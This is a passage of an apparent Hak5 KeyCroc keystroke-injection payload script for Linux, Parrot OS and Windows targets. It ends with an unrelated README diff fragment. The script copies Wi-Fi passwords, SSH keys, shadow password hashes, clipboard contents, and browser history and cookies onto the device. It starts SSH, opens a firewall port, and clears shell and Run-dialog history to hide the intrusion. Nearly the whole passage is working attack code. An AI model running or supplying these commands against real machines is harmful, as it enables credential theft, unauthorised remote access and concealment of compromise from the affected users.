Q STRING "if [ \$(xset -q | grep -Po '(?<=Num Lock:)\W*\K[^ ]*') == \"off\" ]; then echo -ne \"\n\nNUMLOCK STATE: OFF Payload may fail trun NUMLOCK ON\n\n\" ; else echo -ne \"\n\nNUMLOCK STATE: ON\n\n\"; fi" ; Q ENTER
Q ENTER ; sleep 3
#---> Create keycroc directory, Mount keycroc usb drive to target pc, Make KeyCroc folder executable
Q STRING "sudo mkdir /media/\$(whoami)/KeyCroc/ ; sudo mount /dev/sdd /media/\$(whoami)/KeyCroc/ ; sudo chmod 777 /media/\$(whoami)/KeyCroc/"
Q ENTER ; sleep 2
#---> Entering Linux passwd
Q STRING "${PC_PW}"
Q ENTER ; sleep 1
#---> Place keycroc usb drive into variable
Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt"
Q ENTER ; sleep 1
Q STRING "PC_LOOT=/media/\$(whoami)/KeyCroc/loot/Croc_Pot"
Q ENTER ; sleep 1
#---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "whoami | sudo tee \${PC_USER}"
Q ENTER ; sleep 1
#---> Retrieve target PC IP address & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "hostname -I | awk '{print \$1}' | sudo tee -a \${PC_USER} && ip -4 -o addr show eth0 | awk '{print \$4}' | cut -d \"/\" -f 1 | sudo tee -a \${PC_USER} && ip -4 -o addr show eth1 | awk '{print \$4}' | cut -d \"/\" -f 1 | sudo tee -a \${PC_USER} && sudo echo '' >> \${PC_USER}"
Q ENTER ; sleep 1
#---> Check with nmap SSH status of target pc
if [ "$(nmap `sed -n 2p /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt` -PN -p ssh | egrep -o 'open|closed|filtered')" = "closed" ]; then
Q STRING "sudo systemctl start ssh"
Q ENTER
else
Q STRING "SSH is running"
Q ENTER
fi
sleep 1
#---> Retrieve target PC SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "sudo grep -r '^psk=' /etc/NetworkManager/system-connections/ | sed -E -e 's/[/]//g' -e 's/etc//g' -e 's/NetworkManagersystem-connections//g' -e 's/.nmconnection:psk//g' | sudo tee -a \${PC_USER}"
Q ENTER ; sleep 1
#---> Retrieve target PC MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "ip -o link | awk '\$2 != \"lo:\" {print \$2, \$(NF-2)}' | sudo tee -a \${PC_USER}"
Q ENTER ; sleep 1
#---> Retrieve Shark Jack IP if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
Q STRING "ping -c1 -w1 shark.lan | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt"
Q ENTER ; sleep 5
#---> Retrieve Shark Jack MAC address if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
Q STRING "arp shark.lan | awk '/'shark.lan'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee -a /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt"
Q ENTER ; sleep 2
#---> Retrieve packet squirrel MAC address if connected to local network as target PC & save to tools/Croc_Pot/squirrel_mac.txt
Q STRING "arp squirrel.lan | awk '/'squirrel.lan'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/squirrel_mac.txt"
Q ENTER ; sleep 2
#---> Retrieve Lan turtle IP if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
Q STRING "ping -c1 -w1 turtle | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt"
Q ENTER ; sleep 2
#---> Retrieve Lan turtle MAC address if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
Q STRING "arp turtle | awk '/'turtle'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee -a /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt"
Q ENTER ; sleep 2
#---> Retrieve Bash Bunny MAC address if connected to local network as target PC ensure bunny is connected to network & save to tools/Croc_Pot/bunny_mac.txt
Q STRING "arp 172.16.64.1 | awk '/'172.16.64.1'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/bunny_mac.txt"
Q ENTER ; sleep 2
#---> Retrieve target PC .ssh file save to /loot/Croc_Pot/SSH
Q STRING "sudo cp -fr ~/.ssh/. \${PC_LOOT}/SSH/"
Q ENTER ; sleep 2
#---> Retrieve target hash passwd save to /loot/Croc_Pot/target_hash_passwd.txt
Q STRING "sudo getent shadow \$(whoami) | sudo tee \${PC_LOOT}/target_hash_passwd"
Q ENTER ; sleep 2
QUACK STRING "sudo getent shadow \$(whoami) | tee \$MOUNT_LOOT/target_hash_passwd"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve contents of the clipboard
QUACK STRING "echo \"\$(xsel -b)\" >> \$MOUNT_POINT/Target_Clipboard.txt"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve browser History & Cookies (chromium\fire-fox)
QUACK STRING "cp ~/.config/chromium/Default/History \$MOUNT_POINT/Browser history chromium"
QUACK ENTER ; QUACK DELAY 2000
QUACK STRING "cp ~/.config/chromium/Default/Cookies \$MOUNT_POINT/Browser cookies chromium"
QUACK ENTER ; QUACK DELAY 2000
QUACK STRING "cp ~/.mozilla/firefox/*.default-release/formhistory \$MOUNT_POINT/Browser history fire-fox"
QUACK ENTER ; QUACK DELAY 2000
QUACK STRING "cp ~/.mozilla/firefox/*.default-release/cookies \$MOUNT_POINT/Browser cookies fire-fox"
QUACK ENTER ; QUACK DELAY 2000
#---> Unmount keycroc usb drive
Q STRING "sudo umount /media/\$(whoami)/KeyCroc/"
Q ENTER ; sleep 1
#---> Return back to ATTACKMODE HID mode
ATTACKMODE HID
#---> Remove keycroc directory off target pc
Q STRING "sudo rmdir /media/\$(whoami)/KeyCroc/"
Q ENTER ; sleep 1 ;;
*)
#---> Start linux distributions terminal xterm
#---> Unsure of which linux distribution this will work on
Q ALT F2
sleep 1
Q STRING "xterm"
Q ENTER ; sleep 1
#---> Check numlock state on or off
Q STRING "if [ \$(xset -q | grep -Po '(?<=Num Lock:)\W*\K[^ ]*') == \"off\" ]; then echo -ne \"\n\nNUMLOCK STATE: OFF Payload may fail trun NUMLOCK ON\n\n\" ; else echo -ne \"\n\nNUMLOCK STATE: ON\n\n\"; fi" ; Q ENTER
Q ENTER ; sleep 3
#---> Create keycroc directory, Mount keycroc usb drive to target pc, Make KeyCroc folder executable
Q STRING "sudo mkdir /media/\$(whoami)/KeyCroc/ ; sudo mount /dev/sdd /media/\$(whoami)/KeyCroc/ ; sudo chmod 777 /media/\$(whoami)/KeyCroc/"
Q ENTER ; sleep 1
#---> Entering Linux passwd
Q STRING "${PC_PW}"
Q ENTER ; sleep 1
#---> Place keycroc usb drive into variable
Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt"
Q ENTER ; sleep 1
#---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "whoami | sudo tee \${PC_USER}"
Q ENTER ; sleep 1
#---> Retrieve target PC IP address & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "hostname -I | sudo tee -a \${PC_USER} && ip -4 -o addr show eth0 | awk '{print \$4}' | cut -d \"/\" -f 1 | sudo tee -a \${PC_USER} && ip -4 -o addr show eth1 | awk '{print \$4}' | cut -d \"/\" -f 1 | sudo tee -a \${PC_USER} && sudo echo '' >> \${PC_USER}"
Q ENTER ; sleep 1
#---> Check with nmap SSH status of target pc
if [ "$(nmap `sed -n 2p /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt` -PN -p ssh | egrep -o 'open|closed|filtered')" = "closed" ]; then
Q STRING "sudo systemctl start ssh"
Q ENTER
else
Q STRING "SSH is running"
Q ENTER
fi
sleep 1
#---> Retrieve target PC SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "sudo grep -r '^psk=' /etc/NetworkManager/system-connections/ | sed -E -e 's/[/]//g' -e 's/etc//g' -e 's/NetworkManagersystem-connections//g' -e 's/.nmconnection:psk//g' | sudo tee -a \${PC_USER}"
Q ENTER ; sleep 1
#---> Retrieve target PC MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "ip -o link | awk '\$2 != \"lo:\" {print \$2, \$(NF-2)}' | sudo tee -a \${PC_USER}"
Q ENTER ; sleep 1
#---> Retrieve Shark Jack IP if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
Q STRING "ping -c1 -w1 shark.lan | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt"
Q ENTER ; sleep 5
#---> Retrieve Shark Jack MAC address if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
Q STRING "arp shark.lan | awk '/'shark.lan'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee -a /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt"
Q ENTER ; sleep 2
#---> Retrieve packet squirrel MAC address if connected to local network as target PC & save to tools/Croc_Pot/squirrel_mac.txt
Q STRING "arp squirrel.lan | awk '/'squirrel.lan'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/squirrel_mac.txt"
Q ENTER ; sleep 2
#---> Retrieve Lan turtle IP if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
Q STRING "ping -c1 -w1 turtle | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt"
Q ENTER ; sleep 2
#---> Retrieve Lan turtle MAC address if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
Q STRING "arp turtle | awk '/'turtle'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee -a /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt"
Q ENTER ; sleep 2
#---> Retrieve Bash Bunny MAC address if connected to local network as target PC ensure bunny is connected to network & save to tools/Croc_Pot/bunny_mac.txt
Q STRING "arp 172.16.64.1 | awk '/'172.16.64.1'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/bunny_mac.txt"
Q ENTER ; sleep 2
#---> Retrieve target PC .ssh file save to /loot/Croc_Pot/SSH
Q STRING "sudo cp -fr ~/.ssh/. \${PC_LOOT}/SSH/"
Q ENTER ; sleep 2
#---> Retrieve target hash passwd save to /loot/Croc_Pot/target_hash_passwd.txt
Q STRING "sudo getent shadow \$(whoami) | sudo tee \${PC_LOOT}/target_hash_passwd"
Q ENTER ; sleep 2
#---> Unmount keycroc usb drive
Q STRING "sudo umount /media/\$(whoami)/KeyCroc/"
Q ENTER ; sleep 1
#---> Return back to ATTACKMODE HID mode
ATTACKMODE HID
#---> Remove keycroc directory off target pc
Q STRING "sudo rmdir /media/\$(whoami)/KeyCroc/"
Q ENTER ; sleep 1 ;;
esac
QUACK STRING "sudo umount /media/\$(whoami)/KeyCroc"
QUACK ENTER
;;
parrot)
#---> Start mate-terminal Parrot OS
QUACK CONTROL-ALT-d
QUACK ALT-t
QUACK DELAY 2000
#---> Create keycroc directory, Mount keycroc usb drive to target
QUACK STRING "MOUNT_POINT=\"/mnt/usb\" ; sudo mkdir -p \$MOUNT_POINT ; sudo mount -L \"KeyCroc\" \$MOUNT_POINT"
QUACK ENTER ; QUACK DELAY 2000
#---> Entering Linux passwd
QUACK STRING "$TARGET_PW"
QUACK ENTER ; QUACK DELAY 2000
#---> Check numlock state on or off
QUACK STRING "cat /sys/class/leds/input*::numlock/brightness | uniq | sudo tee \$MOUNT_POINT/NumLock.txt"
QUACK ENTER ; QUACK DELAY 2000
if [ "$(sed -n 1p ${CROC_POT_DIR[0]}/NumLock.txt)" = 0 ]; then
QUACK NUMLOCK
sleep 2
fi
#---> Retrieve target user name & save to tools/Croc_Pot/Croc_OS_Target.txt
QUACK STRING "whoami | sudo tee \$MOUNT_POINT/tools/Croc_Pot/Croc_OS_Target.txt"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve target IP, MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt
QUACK STRING "ip -o link show | awk '/wlan/{print \$2}' | cut -d':' -f1 | head -n1 | xargs -I{} sh -c 'ip addr show {} | awk \"/inet / {print \\\$2}\" | cut -d/ -f1; ip link show {} | awk \"/ether/ {print \\\$2}\"' | sudo tee -a \$MOUNT_POINT/tools/Croc_Pot/Croc_OS_Target.txt"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve target SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt
QUACK STRING "sudo grep -r '^psk=' /etc/NetworkManager/system-connections/ | sed -E -e 's/[/]//g' -e 's/etc//g' -e 's/NetworkManagersystem-connections//g' -e 's/.nmconnection:psk//g' | sudo tee -a \$MOUNT_POINT/tools/Croc_Pot/Croc_OS_Target.txt"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve Shark Jack IP, MAC address if connected to local network as target & save to tools/Croc_Pot/shark_ip.txt
QUACK STRING "ip neighbor | grep \$(nslookup shark.lan | awk '/^Address: / {print \$2}') | awk '{print \$1 \"\\n\" \$5}' | sudo tee \$MOUNT_POINT/tools/Croc_Pot/shark_ip.txt"
QUACK ENTER ; QUACK DELAY 5000
#---> Retrieve packet squirrel IP, MAC address if connected to local network as target & save to tools/Croc_Pot/squirrel_mac.txt
QUACK STRING "ip neighbor | grep \$(nslookup squirrel.lan | awk '/^Address: / {print \$2; exit}') | awk '{print \$1 \"\\n\" \$5}' | sudo tee \$MOUNT_POINT/tools/Croc_Pot/squirrel_mac.txt"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve Lan turtle IP, MAC address if connected to local network as target & save to tools/Croc_Pot/turtle_mac.txt
QUACK STRING "ip neighbor | grep \$(nslookup turtle.lan | awk '/^Address: / {print \$2; exit}') | awk '{print \$1 \"\\n\" \$5}' | sudo tee \$MOUNT_POINT/tools/Croc_Pot/turtle_mac.txt"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve Bash Bunny MAC address if connected to local network as target ensure bunny is connected to network & save to tools/Croc_Pot/bunny_mac.txt
QUACK STRING "ip neighbor | grep \$(nslookup 172.16.64.1 | awk '/^Address: / {print \$2; exit}') | awk '{print \$1 \"\\n\" \$5}' | sudo tee \$MOUNT_POINT/tools/Croc_Pot/bunny_mac.txt"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve target .ssh file save to /loot/Croc_Pot/SSH
QUACK STRING "sudo cp -fr ~/.ssh/. \$MOUNT_POINT/loot/Croc_Pot/SSH/"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve target file Structure
QUACK STRING "tree -f -a | sudo tee \$MOUNT_POINT/tools/Croc_Pot/Target_File_Structure.txt > /dev/null"
QUACK ENTER ; QUACK DELAY 3000
#---> Retrieve target hash passwd save to /loot/Croc_Pot/target_hash_passwd.txt
QUACK STRING "sudo getent shadow \$(whoami) | sudo tee \$MOUNT_POINT/loot/Croc_Pot/target_hash_passwd"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve browser History & Cookies (chromium\fire-fox)
QUACK STRING "cp ~/.config/chromium/Default/History \$MOUNT_POINT/Browser history chromium"
QUACK ENTER ; QUACK DELAY 2000
QUACK STRING "cp ~/.config/chromium/Default/Cookies \$MOUNT_POINT/Browser cookies chromium"
QUACK ENTER ; QUACK DELAY 2000
QUACK STRING "cp ~/.mozilla/firefox/*.default-release/formhistory \$MOUNT_POINT/Browser history fire-fox"
QUACK ENTER ; QUACK DELAY 2000
QUACK STRING "cp ~/.mozilla/firefox/*.default-release/cookies \$MOUNT_POINT/Browser cookies fire-fox"
QUACK ENTER ; QUACK DELAY 2000
#---> Unmount keycroc usb drive
QUACK STRING "sudo umount \$MOUNT_POINT"
QUACK ENTER
;;
esac
;;
esac
#---> Start SSH session with target PC
Q STRING "ssh -o \"StrictHostKeyChecking no\" root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)"
Q ENTER ; sleep 2
#---> Return back to ATTACKMODE HID mode
QUACK DELAY 3000
ATTACKMODE HID
QUACK DELAY 3000
if [ "$TARGET_HOSTNAME" = raspberrypi ]; then
QUACK NUMLOCK
QUACK DELAY 2000
fi
#---> sed to remove powershell output unreadable character, "\r" endlines, replace "-" with ":"
if [ "$TARGET_OS" = "WINDOWS" ]; then
sed -i -e '1s/^[^[:print:]]*//' ${CROC_POT_DIR[0]}/Croc_OS_Target.txt ${CROC_POT_DIR[0]}/shark_ip.txt ${CROC_POT_DIR[0]}/squirrel_mac.txt ${CROC_POT_DIR[0]}/bunny_mac.txt ${CROC_POT_DIR[0]}/turtle_mac.txt ${CROC_POT_DIR[0]}/NumLock.txt ${CROC_POT_DIR[0]}/target_email.txt
sed -i 's/\r//g' ${CROC_POT_DIR[0]}/Croc_OS_Target.txt ${CROC_POT_DIR[0]}/shark_ip.txt ${CROC_POT_DIR[0]}/squirrel_mac.txt ${CROC_POT_DIR[0]}/turtle_mac.txt ${CROC_POT_DIR[0]}/bunny_mac.txt ${CROC_POT_DIR[0]}/NumLock.txt ${CROC_POT_DIR[0]}/target_email.txt
sed -i 's/-/:/g' ${CROC_POT_DIR[0]}/shark_ip.txt ${CROC_POT_DIR[0]}/squirrel_mac.txt ${CROC_POT_DIR[0]}/turtle_mac.txt ${CROC_POT_DIR[0]}/bunny_mac.txt
fi
#----> Check with nmap status of SSH on target
#----> Make sure that Windows Defender Firewall allows inbound connections to Windows through TCP port 22:
NMAP_SSH="$(nmap "$(sed -n 2p ${CROC_POT_DIR[0]}/Croc_OS_Target.txt)" -PN -p ssh | grep -E -o 'open|closed|filtered')"
if [ "$TARGET_OS" = "WINDOWS" ]; then
if [ "$NMAP_SSH" = "open" ]; then
QUACK STRING "Get-Service sshd"
QUACK ENTER ; QUACK DELAY 2000
elif [ "$NMAP_SSH" = "closed" ] || [ "$NMAP_SSH" = "filtered" ]; then
QUACK STRING "Set-Service -Name sshd -StartupType 'Automatic' ; Start-Service sshd"
QUACK ENTER ; QUACK DELAY 2000
QUACK STRING "New-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server (sshd)' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22"
QUACK ENTER ; QUACK DELAY 2000
QUACK STRING "restart-service sshd"
QUACK ENTER ; QUACK DELAY 2000
QUACK STRING "Get-Service sshd ; Get-NetFirewallRule -Name *OpenSSH-Server* | select Name, DisplayName, Description, Enabled"
QUACK ENTER ; QUACK DELAY 6000
else
QUACK STRING "Get-Service sshd ; Get-NetFirewallRule -Name *OpenSSH-Server* | select Name, DisplayName, Description, Enabled"
QUACK ENTER ; QUACK DELAY 6000
fi
elif [ "$TARGET_OS" = "LINUX" ]; then
if [ "$NMAP_SSH" = "open" ]; then
QUACK STRING "sudo systemctl status sshd"
QUACK ENTER ; QUACK DELAY 3000 ; QUACK STRING "q"
elif [ "$NMAP_SSH" = "closed" ] || [ "$NMAP_SSH" = "filtered" ]; then
QUACK STRING "sudo systemctl start ssh"
QUACK ENTER ; QUACK DELAY 3000
QUACK STRING "sudo systemctl status sshd"
QUACK ENTER ; QUACK DELAY 3000 ; QUACK STRING "q"
else
QUACK STRING "sudo systemctl status sshd"
QUACK ENTER ; QUACK DELAY 3000 ; QUACK STRING "q"
QUACK STRING "sudo iptables -L"
QUACK ENTER ; QUACK DELAY 3000
fi
else
QUACK DELAY 1000
fi
QUACK ENTER
#---> Check target history and clear history
if [ "$TARGET_OS" = "WINDOWS" ]; then
QUACK STRING "Get-PnpDevice -Class \"Keyboard\" | Where-Object {\$_.Status -eq \"OK\" -and \$_.ClassGuid -eq \"{4d36e96b-e325-11ce-bfc1-08002be10318}\"} | Select-Object *"
QUACK ENTER ; QUACK DELAY 3000
QUACK STRING "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*'"
QUACK ENTER ; QUACK DELAY 2000
QUACK STRING "Get-Content \"\$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt\""
QUACK ENTER ; QUACK DELAY 2000
QUACK STRING "Clear-History ; Remove-Item \"\$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt\""
QUACK ENTER ; QUACK DELAY 2000
elif [ "$TARGET_OS" = "LINUX" ]; then
QUACK STRING "dmesg | grep \"usb.*RNDIS/Ethernet Gadget\|Keyboard\|usb-storage\""
QUACK ENTER ; QUACK DELAY 3000
QUACK STRING "history -n 500 ; history"
QUACK ENTER ; QUACK DELAY 2000
QUACK STRING "history -c ; rm ~/.bash_history"
QUACK ENTER ; QUACK DELAY 2000
fi
#---> Start SSH session with target
QUACK STRING "ssh -o \"StrictHostKeyChecking no\" root@$(ifconfig wlan0 | grep "inet addr" | awk '{print $2}' | cut -c 6-)"
QUACK ENTER ; QUACK DELAY 2000
#---> Entering keycroc passwd
Q STRING "${CROC_PW}"
Q ENTER ; sleep 1
QUACK STRING "$CROC_PW"
QUACK ENTER ; QUACK DELAY 2000
#---> Starting Croc_Pot
Q STRING "/root/udisk/tools/Croc_Pot.sh"
Q ENTER
QUACK STRING "${CROC_POT_DIR[0]}.sh"
QUACK ENTER


@@ -15,7 +15,7 @@
* **TESTED ON**
- Windows 10
- Raspberry pi 4
- Raspberry pi 5 bookworm
- linux parrot os
- Sorry no support for MAC OS